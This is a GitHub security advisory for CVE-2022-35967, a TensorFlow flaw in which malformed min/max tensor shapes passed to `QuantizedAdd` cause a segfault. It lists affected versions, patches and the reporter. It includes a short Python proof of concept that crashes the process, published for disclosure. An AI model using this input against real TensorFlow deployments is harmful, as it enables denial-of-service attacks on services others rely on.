GitHub Advisoryadvisory · PyPI
GHSA-v6h3-348g-6h5x TensorFlow vulnerable to segfault in `QuantizedAdd`
MEDIUM
Official page ↗
- Aliases
- CVE-2022-35967
- Ecosystem
- PyPI
- Packages
- tensorflow, tensorflow-cpu, tensorflow-gpu
- Severity
- Moderate
- CVSS vector
- CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H
- Weaknesses
- CWE-20
- Reviewed
- 2022-09-16
Affected packages
• PyPI tensorflow: < 2.7.2 → fixed in 2.7.2
• PyPI tensorflow: >= 2.8.0, < 2.8.1 → fixed in 2.8.1
• PyPI tensorflow: >= 2.9.0, < 2.9.1 → fixed in 2.9.1
• PyPI tensorflow-cpu: < 2.7.2 → fixed in 2.7.2
• PyPI tensorflow-cpu: >= 2.8.0, < 2.8.1 → fixed in 2.8.1
• PyPI tensorflow-cpu: >= 2.9.0, < 2.9.1 → fixed in 2.9.1
• PyPI tensorflow-gpu: < 2.7.2 → fixed in 2.7.2
• PyPI tensorflow-gpu: >= 2.8.0, < 2.8.1 → fixed in 2.8.1
• PyPI tensorflow-gpu: >= 2.9.0, < 2.9.1 → fixed in 2.9.1
Description
Impact
If `QuantizedAdd` is given `min_input` or `max_input` tensors of a nonzero rank, it results in a segfault that can be used to trigger a denial of service attack.
```python
import tensorflow as tf
Toutput = tf.qint32
x = tf.constant(140, shape=[1], dtype=tf.quint8)
y = tf.constant(26, shape=[10], dtype=tf.quint8)
min_x = tf.constant([], shape=[0], dtype=tf.float32)
max_x = tf.constant(0, shape=[], dtype=tf.float32)
min_y = tf.constant(0, shape=[], dtype=tf.float32)
max_y = tf.constant(0, shape=[], dtype=tf.float32)
tf.raw_ops.QuantizedAdd(x=x, y=y, min_x=min_x, max_x=max_x, min_y=min_y, max_y=max_y, Toutput=Toutput)
```
Patches
We have patched the issue in GitHub commit 49b3824d83af706df0ad07e4e677d88659756d89.
The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range.
For more information
Please consult our security guide for more information regarding the security model and how to contact us with issues and questions.
Attribution
This vulnerability has been reported by Neophytos Christou, Secure Systems Labs, Brown University.
Related
Alias · CVE (1)
- CVE-2022-35967 TensorFlow is an open source platform for machine learning. vulnerability
Weakness · CWE (1)
- CWE-20 Improper Input Validation weakness
References
- https://github.com/tensorflow/tensorflow/security/advisories/GHSA-v6h3-348g-6h5x web
- https://nvd.nist.gov/vuln/detail/CVE-2022-35967 advisory
- https://github.com/tensorflow/tensorflow/commit/49b3824d83af706df0ad07e4e677d88659756d89 web
- https://github.com/tensorflow/tensorflow package
- https://github.com/tensorflow/tensorflow/releases/tag/v2.10.0 web